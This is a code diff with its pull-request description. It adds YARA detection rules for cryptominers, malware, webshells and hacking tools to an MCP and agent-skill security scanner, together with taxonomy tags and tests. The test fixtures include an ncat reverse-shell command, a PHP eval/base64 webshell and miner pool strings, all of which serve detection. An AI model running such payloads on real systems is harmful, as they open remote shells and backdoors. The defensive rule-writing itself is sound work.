                 for result in &resource_results {
                     triggered_rules.insert(result.rule_name.clone());
-                    if let Some(file_name) = rule_name_to_file_name(&result.rule_name) {
+                    if let Some(file_name) = self.scanner.rule_file_for(&result.rule_name) {
                         triggered_file_names.insert(file_name);
                     } else {
                         triggered_file_names.insert(result.rule_name.clone());
@@ -905,7 +899,7 @@ impl Scanner for YaraScanner {
                             .into_iter()
                             .map(|rule_name| {
                                 // Get the file name for this rule
-                                if let Some(file_name) = rule_name_to_file_name(&rule_name) {
+                                if let Some(file_name) = self.scanner.rule_file_for(&rule_name) {
                                     format!("{file_name}:{rule_name}")
                                 } else {
                                     rule_name
@@ -1783,7 +1777,7 @@ impl MCPScanner {
                                 .clone()
                                 .unwrap_or_else(|| server.to_display_url()),
                             rule_name: m.rule_name.clone(),
-                            rule_file: rule_name_to_file_name(&m.rule_name),
+                            rule_file: engine.rule_file_for(&m.rule_name),
                             matched_text: None,
                             context: generate_context_message("server", &m.rule_name),
                             rule_metadata: m.metadata.clone(),
@@ -2706,6 +2700,95 @@ mod tests {
             // Real YARA-X may or may not have matches depending on rule content
             // Just verify we got a valid result (empty or with matches)
         }
+    }
+
+    /// The rule-identifier → file-stem map is built at load time from the
+    /// compiled rules, so every .yar file in rules/pre is covered without
+    /// a hand-maintained name table. One representative rule per file
+    /// guards against a file silently failing to compile (the loader
+    /// warns and skips on compile errors instead of failing the load).
+    #[test]
+    #[cfg(feature = "yara-x-scanning")]
+    fn test_rule_file_map_covers_all_pre_rule_files() {
+        let scanner = ThreatRules::new("rules")
+            .expect("Should be able to create ThreatRules with rules directory");
+
+        for (rule_identifier, file_stem) in [
+            ("SecretsLeakage", "secrets_leakage"),
+            ("CommandInjection", "command_injection"),
+            ("SQLInjection", "sql_injection"),
+            ("PathTraversalVulnerability", "path_traversal"),
+            ("MCPConfigRisk", "mcp_config_risk"),
+            ("CrossOriginEscalation", "cross_origin_escalation"),
+            ("PromptInjectionSignature", "skill_prompt_injection"),
+            ("AutonomyAbuse", "skill_authority"),
+            ("SkillCredentialHarvesting", "skill_credential_harvesting"),
+            ("SkillToolChainingExfiltration", "skill_tool_chaining_abuse"),
+            ("SkillSystemManipulation", "skill_system_manipulation"),
+            ("CryptoStratumProtocol", "cryptominers"),
+            ("ReverseShell", "malware"),
+            ("PHPWebshellGeneric", "webshells"),
+            ("OffensiveToolReferences", "hacktools"),
+        ] {
+            assert_eq!(
+                scanner.rule_file_for(rule_identifier),
+                Some(file_stem.to_string()),
+                "rule {rule_identifier} should map to file {file_stem}"
+            );
+        }
+
+        // Synthetic findings never go through the YARA scan path and are
+        // intentionally absent from the map.
+        assert_eq!(scanner.rule_file_for("MCPConfigChanged"), None);
+    }
+
+    /// Loads the real shipped `rules/pre` files and confirms they fire on
+    /// known-malicious payloads. The other YARA tests scan inline synthetic
+    /// rules, so they prove the engine works but not that the shipped rule
+    /// content is correct — a broken regex in e.g. `cryptominers.yar` would
+    /// pass every other test. This guards the rule bodies themselves, with
+    /// extra coverage for the ported SkillSpector-derived rules.
+    #[test]
+    #[cfg(feature = "yara-x-scanning")]
+    fn test_shipped_pre_rules_fire_on_malicious_payloads() {
+        let scanner = ThreatRules::new("rules")
+            .expect("Should be able to create ThreatRules with rules directory");
+
+        // (payload, rule identifier that must appear in the matches)
+        let cases = [
+            (
+                "stratum+tcp://pool.minexmr.com:4444 -u WALLET -p x",
+                "CryptoStratumProtocol",
+            ),
+            ("pool: pool.minexmr.com", "CryptoMiningPools"),
+            (
+                "<?php eval(base64_decode($_POST['cfg'])); ?>",
+                "PHPWebshellObfuscated",
+            ),
+            ("ncat 10.0.0.5 4444 -e /bin/bash", "ReverseShell"),
+            ("nmap -sS 10.0.0.0/24", "OffensiveToolReferences"),
+        ];
+
+        for (payload, expected_rule) in cases {
+            let matches = scanner.pre_scan(payload, "test");
+            assert!(
+                matches.iter().any(|m| m.rule_name == expected_rule),
+                "payload {payload:?} should trigger {expected_rule}; got: {:?}",
+                matches.iter().map(|m| &m.rule_name).collect::<Vec<_>>()
+            );
+        }
+
+        // Benign skill prose must not trip any pre-scan rule.
+        let benign = "This skill helps you format markdown tables and tidy whitespace.";
+        let benign_matches = scanner.pre_scan(benign, "test");
+        assert!(
+            benign_matches.is_empty(),
+            "benign text should not match any rule; got: {:?}",
+            benign_matches
+                .iter()
+                .map(|m| &m.rule_name)
+                .collect::<Vec<_>>()
+        );
     }
 
     #[test]

--- a/src/scanner.rs
+++ b/src/scanner.rs
@@ -2766,7 +2766,8 @@ mod tests {
                 "PHPWebshellObfuscated",
             ),
             ("ncat 10.0.0.5 4444 -e /bin/bash", "ReverseShell"),
-            ("nmap -sS 10.0.0.0/24", "OffensiveToolReferences"),
+            ("sqlmap --url http://x --dump", "OffensiveToolReferences"),
+            ("nmap -sS 10.0.0.0/24", "NetworkReconnaissance"),
         ];
 
         for (payload, expected_rule) in cases {

--- a/src/taxonomy.rs
+++ b/src/taxonomy.rs
@@ -134,6 +134,36 @@ pub fn tags_for_yara_rule(rule_name: &str) -> Vec<OwaspTag> {
             vec![OwaspTag::new("MCP03"), OwaspTag::new("MCP04")]
         }
 
+        // cryptominers.yar — embedded mining payloads. The skill/tool is
+        // doing something other than what it claims (tool poisoning).
+        "CryptoStratumProtocol" | "CryptoMiningPools" | "CryptoMinerSoftware"
+        | "CryptoCoinjacking" => vec![OwaspTag::new("MCP02")],
+
+        // malware.yar — classic malware behavior embedded in skill/tool
+        // content (ported from NVIDIA SkillSpector / signature-base).
+        "ReverseShell" | "C2FrameworkIndicators" => {
+            vec![OwaspTag::new("MCP02"), OwaspTag::new("MCP07")]
+        }
+        "BackdoorPersistence" | "RansomwareBehavior" => {
+            vec![OwaspTag::new("MCP02"), OwaspTag::new("MCP03")]
+        }
+        "KeyloggerIndicators" => vec![OwaspTag::new("MCP02"), OwaspTag::new("MCP09")],
+        "InfoStealer" => vec![OwaspTag::new("MCP06"), OwaspTag::new("MCP09")],
+
+        // webshells.yar — remote command-execution backdoors.
+        "PHPWebshellGeneric" | "PHPWebshellObfuscated" | "PHPWebshellKnown" | "PythonWebshell"
+        | "JSPWebshell" | "ASPXWebshell" => {
+            vec![OwaspTag::new("MCP02"), OwaspTag::new("MCP07")]
+        }
+
+        // hacktools.yar — offensive tooling, recon, and exploit
+        // frameworks a legitimate skill should not invoke.
+        "OffensiveToolReferences" | "NetworkReconnaissance" | "ExploitFramework" => {
+            vec![OwaspTag::new("MCP02")]
+        }
+        "PrivilegeEscalationTools" => vec![OwaspTag::new("MCP02"), OwaspTag::new("MCP03")],
+        "PhishingKit" => vec![OwaspTag::new("MCP02"), OwaspTag::new("MCP06")],
+
         // Synthetic findings emitted by the skill parser (src/skills.rs)
         // for structural risks the YARA passes can't see (frontmatter
         // grants, missing triggers, network-egress tool grants).

--- a/src/taxonomy.rs
+++ b/src/taxonomy.rs
@@ -246,6 +246,31 @@ mod tests {
             "SkillCredentialHarvesting",
             "SkillToolChainingExfiltration",
             "SkillSystemManipulation",
+            // cryptominers.yar
+            "CryptoStratumProtocol",
+            "CryptoMiningPools",
+            "CryptoMinerSoftware",
+            "CryptoCoinjacking",
+            // malware.yar
+            "ReverseShell",
+            "BackdoorPersistence",
+            "KeyloggerIndicators",
+            "RansomwareBehavior",
+            "C2FrameworkIndicators",
+            "InfoStealer",
+            // webshells.yar
+            "PHPWebshellGeneric",
+            "PHPWebshellObfuscated",
+            "PHPWebshellKnown",
+            "PythonWebshell",
+            "JSPWebshell",
+            "ASPXWebshell",
+            // hacktools.yar
+            "OffensiveToolReferences",
+            "NetworkReconnaissance",
+            "PrivilegeEscalationTools",
+            "ExploitFramework",
+            "PhishingKit",
         ] {
             assert!(
                 !tags_for_yara_rule(name).is_empty(),

--- a/src/taxonomy.rs
+++ b/src/taxonomy.rs
@@ -136,7 +136,9 @@ pub fn tags_for_yara_rule(rule_name: &str) -> Vec<OwaspTag> {
 
         // cryptominers.yar — embedded mining payloads. The skill/tool is
         // doing something other than what it claims (tool poisoning).
-        "CryptoStratumProtocol" | "CryptoMiningPools" | "CryptoMinerSoftware"
+        "CryptoStratumProtocol"
+        | "CryptoMiningPools"
+        | "CryptoMinerSoftware"
         | "CryptoCoinjacking" => vec![OwaspTag::new("MCP02")],
 
         // malware.yar — classic malware behavior embedded in skill/tool
@@ -151,8 +153,12 @@ pub fn tags_for_yara_rule(rule_name: &str) -> Vec<OwaspTag> {
         "InfoStealer" => vec![OwaspTag::new("MCP06"), OwaspTag::new("MCP09")],
 
         // webshells.yar — remote command-execution backdoors.
-        "PHPWebshellGeneric" | "PHPWebshellObfuscated" | "PHPWebshellKnown" | "PythonWebshell"
-        | "JSPWebshell" | "ASPXWebshell" => {
+        "PHPWebshellGeneric"
+        | "PHPWebshellObfuscated"
+        | "PHPWebshellKnown"
+        | "PythonWebshell"
+        | "JSPWebshell"
+        | "ASPXWebshell" => {
             vec![OwaspTag::new("MCP02"), OwaspTag::new("MCP07")]
         }
 


### PR DESCRIPTION
## What

Adopts four YARA rule files from [NVIDIA SkillSpector](https://github.com/NVIDIA/SkillSpector) into `rules/pre/`, covering threat classes ramparts had **no** coverage for:

| File | Rules | Covers |
|---|---|---|
| `cryptominers.yar` | 4 | stratum protocol, known mining pools, miner software, browser cryptojacking |
| `malware.yar` | 6 | reverse shells, backdoor persistence, keyloggers, ransomware behavior, C2 frameworks, info stealers |
| `webshells.yar` | 6 | PHP (generic/obfuscated/known families), Python, JSP, ASPX webshells |
| `hacktools.yar` | 5 | offensive tools, network recon, privesc tools, exploit frameworks, phishing kits |

SkillSpector's rules derive from [Neo23x0/signature-base](https://github.com/Neo23x0/signature-base) (DRL 1.1); attribution headers are preserved in each file. The two rule sets were otherwise non-overlapping — ramparts covers agent/prompt-layer threats, SkillSpector covers classic malware IOCs in skill source.

## Adaptations from upstream

- Converted to ramparts conventions: PascalCase rule identifiers, `name`/`severity`/`category`/`author`/`version` meta format.
- **FP-hardened** (documented per file), given ramparts' history of pruning doc-prone strings: dropped bare `t-rex`, browser `Cookies`, and loose `LD_PRELOAD` strings; required `2 of them` for miner-software names; tightened `BloodHound` to tool-specific forms.
- **De-duped** against existing rules: removed the `bash -i`/`nc -e` reverse-shell variants already owned by `command_injection.yar` (kept the ncat/socat/mkfifo/python/perl/php/ruby/powershell variants it misses); LD_PRELOAD stays with `skill_system_manipulation.yar`.

## Folder-driven rule registration

Per the goal of "new `.yar` file in the folder ⇒ no code changes," the hand-maintained `rule_name_to_file_name` match table in `scanner.rs` (which already silently missed several rules) is replaced by a `rule_file_map` built at load time from the compiled rule identifiers. The only remaining per-rule code is OWASP taxonomy tagging in `taxonomy.rs` (intentionally in-code per ramparts#101) — added arms for all 21 new rules.

## Tests

- `test_rule_file_map_covers_all_pre_rule_files` — asserts one representative rule per `.yar` file maps correctly; doubles as a guard against a file silently failing to compile (loader warns-and-skips on compile error).
- `test_shipped_pre_rules_fire_on_malicious_payloads` — loads the **real shipped** rules and asserts they fire on known-malicious payloads while staying quiet on benign prose. Pure YARA path, deterministic, no LLM/network.

## Verification

- `cargo clippy --all-targets`: clean.
- `cargo test`: 184 pass (the lone `test_env_mapping_function` flake is pre-existing — a process-env race between parallel tests, passes in isolation, unrelated to this change).
- Manual: scanned the 14 real Highflame skills → **zero false positives** from the new rules; scanned a synthetic malicious skill → `CryptoStratumProtocol`, `CryptoMiningPools`, `PHPWebshellObfuscated`, `ReverseShell` all fire with correct severities and OWASP tags.